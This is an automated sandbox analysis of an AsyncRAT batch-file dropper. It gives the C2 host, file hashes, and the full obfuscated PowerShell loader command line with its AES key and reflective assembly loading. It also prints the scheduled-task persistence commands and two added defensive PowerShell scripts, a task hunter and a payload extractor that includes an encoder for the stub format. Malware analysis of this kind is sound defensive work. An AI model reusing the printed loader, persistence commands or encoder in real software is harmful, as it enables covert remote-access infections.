Analysis

  • max time kernel
    48s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-10-2024 18:25

General

  • Target

    Client-Built.bat

  • Size

    309KB

  • MD5

    779ea367cf71bed6a1f3b78a48d7c3fd

  • SHA1

    a8a6caee309e724367a686ab9da2a65f3522eba0

  • SHA256

    53666bd18a4e85ff72aac790ea41f603e3d0ce78d12a22bfcdb2e46d1f1d4afd

  • SHA512

    8e54f78210ec383fd24e2fe0bc0beb2d0aad0536443fe88e5f8f10959913bd66000d6448219f3137589c707c85a5e3cac3b03d6fb68cc942543ee51f1e5faa94

  • SSDEEP

    6144:L3pboxHrffvx5qjFakMpbeZuwRLfktxH44ScYQafuqzyFhSd90:LxOrfOupiRLQScYLfuDFs90

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

runderscore00-37568.portmap.host:37568

Attributes
  • delay

    3

  • install

    true

  • install_file

    Minecraft.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with a hidden display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
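
The two signatures above correspond to two logon-persistence tasks in the process tree below: RuntimeBroker_startup_483_str (registered through Register-ScheduledTask, hidden, RunLevel Highest, action is the .vbs in %AppData%) and Minecraft (registered through schtasks /sc onlogon /rl highest, action is %AppData%\Minecraft.exe). The script below is an added hunt, not part of the report: it lists every task whose action runs from a user-writable directory or launches a script, notes RunLevel Highest and the Hidden setting as context, and compares the target file's SHA256 with the hashes listed in the Downloads section. The directory and extension lists are assumptions chosen to cover this sample; it needs the ScheduledTasks module (Windows 8 / Server 2012 or later) and shows other users' tasks only when run elevated.

```powershell
# Added example, not part of the sandbox report: hunt for the sample's two logon tasks
# (RuntimeBroker_startup_483_str -> startup_str_483.vbs, Minecraft -> %AppData%\Minecraft.exe)
# and for anything registered the same way. Lists and hashes are assumptions/copies, see comments.

$KnownHashes = @{   # SHA256 values copied from the Downloads section of the report
    '9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F' = 'Minecraft.exe (dropped AsyncRAT client)'
    '53666BD18A4E85FF72AAC790EA41F603E3D0CE78D12A22BFCDB2E46D1F1D4AFD' = 'startup_str_483.bat (same hash as Client-Built.bat)'
    '23591BE9BDA6ECB5A3763A128661D09FBE0BBE1B51045FF9B085CC881AADFBB5' = 'startup_str_483.vbs'
}
# Assumed lists: user-writable locations a logon task has no business running from, and script extensions.
$UserWritable = @('\AppData\Roaming\', '\AppData\Local\', '\Temp\', '\Users\Public\')
$ScriptExt    = @('.vbs', '.vbe', '.js', '.jse', '.wsf', '.bat', '.cmd', '.ps1', '.hta')

function Resolve-ActionTarget {
    # schtasks /tr and New-ScheduledTaskAction keep the caller's quotes in Execute
    # (the sample passes '"C:\...\Minecraft.exe"'); strip them and expand %VARS%.
    param([string]$Execute)
    return [Environment]::ExpandEnvironmentVariables($Execute.Trim().Trim('"', "'"))
}

function Find-SuspiciousLogonTasks {
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $target = Resolve-ActionTarget $action.Execute
            $why = @()
            foreach ($dir in $UserWritable) {
                if ($target -like "*$dir*") { $why += "runs from $dir"; break }
            }
            $ext = ''
            try { $ext = [IO.Path]::GetExtension($target).ToLower() } catch { }
            if ($ext -in $ScriptExt) { $why += 'launches a script' }
            if ($why.Count -eq 0) { continue }        # only path/script findings make a task reportable
            if ($task.Principal.RunLevel -eq 'Highest') { $why += 'RunLevel Highest' }
            if ($task.Settings.Hidden) { $why += 'hidden' }
            $hash = $null; $ioc = $null
            if (Test-Path -LiteralPath $target -PathType Leaf) {
                $hash = (Get-FileHash -LiteralPath $target -Algorithm SHA256).Hash
                $ioc  = $KnownHashes[$hash]
            }
            [pscustomobject]@{
                Task     = $task.TaskPath + $task.TaskName
                Triggers = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
                Target   = $target
                Why      = $why -join '; '
                SHA256   = $hash
                KnownIOC = $ioc
            }
        }
    }
}

Find-SuspiciousLogonTasks | Sort-Object KnownIOC, Task -Descending | Format-Table -AutoSize
```

On an infected host both tasks surface with a LogonTrigger, RunLevel Highest and a Roaming path in the Target column, and Minecraft.exe additionally matches the report's hash; a task whose target has since been deleted still shows up with an empty SHA256, which is itself worth a look.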

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-Built.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3EOLjVuYmh+6EyzRS0NrQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXQbB=New-Object System.IO.MemoryStream(,$param_var); $AUvTu=New-Object System.IO.MemoryStream; $tCRmZ=New-Object System.IO.Compression.GZipStream($vXQbB, [IO.Compression.CompressionMode]::Decompress); $tCRmZ.CopyTo($AUvTu); $tCRmZ.Dispose(); $vXQbB.Dispose(); $AUvTu.Dispose(); $AUvTu.ToArray();}function execute_function($param_var,$param2_var){ $oYOpP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FcSFc=$oYOpP.EntryPoint; $FcSFc.Invoke($null, $param2_var);}$lXRaI = 'C:\Users\Admin\AppData\Local\Temp\Client-Built.bat';$host.UI.RawUI.WindowTitle = $lXRaI;$enbFg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lXRaI).Split([Environment]::NewLine);foreach ($huNIz in $enbFg) { if ($huNIz.StartsWith(':: ')) { $GZJMV=$huNIz.Substring(3); break; }}$payloads_var=[string[]]$GZJMV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_483_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_483.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_483.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_483.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3952
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:2892
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3EOLjVuYmh+6EyzRS0NrQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXQbB=New-Object System.IO.MemoryStream(,$param_var); $AUvTu=New-Object System.IO.MemoryStream; $tCRmZ=New-Object System.IO.Compression.GZipStream($vXQbB, [IO.Compression.CompressionMode]::Decompress); $tCRmZ.CopyTo($AUvTu); $tCRmZ.Dispose(); $vXQbB.Dispose(); $AUvTu.Dispose(); $AUvTu.ToArray();}function execute_function($param_var,$param2_var){ $oYOpP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $FcSFc=$oYOpP.EntryPoint; $FcSFc.Invoke($null, $param2_var);}$lXRaI = 'C:\Users\Admin\AppData\Roaming\startup_str_483.bat';$host.UI.RawUI.WindowTitle = $lXRaI;$enbFg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lXRaI).Split([Environment]::NewLine);foreach ($huNIz in $enbFg) { if ($huNIz.StartsWith(':: ')) { $GZJMV=$huNIz.Substring(3); break; }}$payloads_var=[string[]]$GZJMV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1660
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Minecraft" /tr '"C:\Users\Admin\AppData\Roaming\Minecraft.exe"' & exit
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3716
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "Minecraft" /tr '"C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3720
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCB8D.tmp.bat""
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2544
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2208
                  • C:\Users\Admin\AppData\Roaming\Minecraft.exe
                    "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3824
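
The powershell.exe command line at depth 2 is the whole loader. It re-reads the .bat it was launched from, takes the first line beginning with ":: ", splits it on "\", and turns each part into a .NET assembly by Base64-decoding it, decrypting it with AES-256-CBC/PKCS7 under the hard-coded key and IV, and GZip-decompressing the result, then calls Assembly.Load and invokes the entry point (the reversed string literals are FromBase64String, ReadAllText and Load). The script below is an added static extractor, not code from the report or the sample: it repeats that pipeline but writes each decoded blob to disk instead of loading it, so the payloads can be hashed and examined. The key and IV are the values from the command line; the output file names and the demo .bat it builds in %TEMP% from two constructed plaintexts are assumptions, since the report does not reproduce the sample's ":: " line.

```powershell
# Added example, not part of the sandbox report: static extractor for the
# ":: <b64>\<b64>" loader stub shown in the powershell.exe command line.
# Per blob, exactly as the stub does it: Base64 -> AES-256-CBC/PKCS7 -> GZip.
# The only change is the last step: bytes go to disk, never to [Reflection.Assembly]::Load.
# Key/IV are the stub's hard-coded values; output paths and the demo payloads are assumptions.

$Key = [Convert]::FromBase64String('yhQ3heawMyvGHcN/HVfcC9bTWPMTkS0JHj1mcOoLd0g=')   # 32 bytes => AES-256
$IV  = [Convert]::FromBase64String('Q3EOLjVuYmh+6EyzRS0NrQ==')                       # 16 bytes

function New-StubAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    return $aes
}

function Unprotect-Blob {
    # Mirrors the stub's decrypt_function.
    param([byte[]]$Cipher)
    $aes = New-StubAes
    $dec = $aes.CreateDecryptor()
    try     { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }
}

function Expand-Gzip {
    # Mirrors the stub's decompress_function.
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

function Get-StubPayloads {
    # Same locator the stub uses: first line starting with ':: ', blobs separated by '\'.
    param([string]$BatPath, [string]$OutDir = (Split-Path -Parent $BatPath))
    $marker = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $marker) { throw "no ':: ' payload line in $BatPath" }
    $i = 0
    foreach ($b64 in ($marker.Substring(3) -split '\\')) {
        $i++
        $raw  = Expand-Gzip (Unprotect-Blob ([Convert]::FromBase64String($b64)))
        $file = Join-Path $OutDir ("payload{0}.bin" -f $i)      # assumed output name
        [IO.File]::WriteAllBytes($file, $raw)
        [pscustomobject]@{
            Index  = $i
            Bytes  = $raw.Length
            IsPE   = ($raw.Length -ge 2 -and $raw[0] -eq 0x4D -and $raw[1] -eq 0x5A)   # 'MZ'
            SHA256 = (Get-FileHash -LiteralPath $file -Algorithm SHA256).Hash
            Path   = $file
        }
    }
}

# --- Constructed demo so the script runs offline (the report does not reproduce the real ':: ' line) ---
function Protect-Blob {
    # Inverse of the stub's pipeline: GZip -> AES -> Base64.
    param([byte[]]$Plain)
    $ms = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Compress)
    $gz.Write($Plain, 0, $Plain.Length); $gz.Dispose()          # closes $ms; ToArray still works
    $aes = New-StubAes
    $enc = $aes.CreateEncryptor()
    $packed = $ms.ToArray()
    $cipher = $enc.TransformFinalBlock($packed, 0, $packed.Length)
    $enc.Dispose(); $aes.Dispose()
    return [Convert]::ToBase64String($cipher)
}

$demoDir = Join-Path $env:TEMP 'stub-demo'
New-Item -ItemType Directory -Force -Path $demoDir | Out-Null
$demoBat = Join-Path $demoDir 'demo.bat'
$p1 = [Text.Encoding]::ASCII.GetBytes('MZ constructed payload one')   # fake MZ prefix, not a real PE
$p2 = [Text.Encoding]::ASCII.GetBytes('constructed payload two')
@('@echo off', (':: ' + (Protect-Blob $p1) + '\' + (Protect-Blob $p2))) |
    Set-Content -LiteralPath $demoBat -Encoding ASCII
Get-StubPayloads -BatPath $demoBat | Format-Table -AutoSize
```

Against the real sample, run Get-StubPayloads -BatPath 'C:\path\to\Client-Built.bat' in an isolated VM; nothing in the function executes the decoded bytes. The IsPE column tells you which blob is an MZ image and the SHA256 column is the value to pivot on. Since startup_str_483.bat in the Downloads section has the same hashes as Client-Built.bat, both files yield the same two payloads.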

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        1cc5e033811a5d520bb4a6904b5c433b

        SHA1

        c159a342ed372790600b3a6ac97e274638a0ce9a

        SHA256

        9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

        SHA512

        dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0zpdkmt.tvv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\tmpCB8D.tmp.bat

        Filesize

        153B

        MD5

        099954b4cde2e5dbd85a265369a906bf

        SHA1

        4e0fcc878f77a82f9d6000679513d025c0ecc4b4

        SHA256

        bb057dcf346d9228f66f55ca0769d0fb58f04d87927b708d912c9614d76c5486

        SHA512

        a00c56a418aed2b160dcb0f519cf70f766d788220b65a633be7ac2cb62b1227107fe61673428afa7ec5d1d60f2e417652b151982e5d833d9fb051e8801eede3a

      • C:\Users\Admin\AppData\Roaming\Minecraft.exe

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • C:\Users\Admin\AppData\Roaming\startup_str_483.bat

        Filesize

        309KB

        MD5

        779ea367cf71bed6a1f3b78a48d7c3fd

        SHA1

        a8a6caee309e724367a686ab9da2a65f3522eba0

        SHA256

        53666bd18a4e85ff72aac790ea41f603e3d0ce78d12a22bfcdb2e46d1f1d4afd

        SHA512

        8e54f78210ec383fd24e2fe0bc0beb2d0aad0536443fe88e5f8f10959913bd66000d6448219f3137589c707c85a5e3cac3b03d6fb68cc942543ee51f1e5faa94

      • C:\Users\Admin\AppData\Roaming\startup_str_483.vbs

        Filesize

        115B

        MD5

        7d7bdd102c0cb18fe09c62e38bc9c651

        SHA1

        72005e64cdea5ccf472c4c26899e67e68c6c4266

        SHA256

        23591be9bda6ecb5a3763a128661d09fbe0bbe1b51045ff9b085cc881aadfbb5

        SHA512

        cbb568f1d2bdee5b40052e9da0fb2e785f097e62b86d0804f6eb8eb230fd3058cc8057240e837443e9f491e5c5e8b2694ca9731884a2ef98272f9e3e0f4041dc

      • \??\PIPE\srvsvc

        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • memory/1660-50-0x000001EECDAC0000-0x000001EECDAE4000-memory.dmp

        Filesize

        144KB

      • memory/1932-13-0x000001B359040000-0x000001B359048000-memory.dmp

        Filesize

        32KB

      • memory/1932-14-0x000001B3735E0000-0x000001B37361C000-memory.dmp

        Filesize

        240KB

      • memory/1932-0-0x00007FFEE5FA3000-0x00007FFEE5FA5000-memory.dmp

        Filesize

        8KB

      • memory/1932-12-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/1932-51-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/1932-11-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/1932-1-0x000001B3712F0000-0x000001B371312000-memory.dmp

        Filesize

        136KB

      • memory/2396-30-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/2396-27-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/2396-26-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/2396-21-0x00007FFEE5FA0000-0x00007FFEE6A61000-memory.dmp

        Filesize

        10.8MB

      • memory/3824-68-0x000001E6D6A40000-0x000001E6D6A84000-memory.dmp

        Filesize

        272KB

      • memory/3824-69-0x000001E6D6ED0000-0x000001E6D6F46000-memory.dmp

        Filesize

        472KB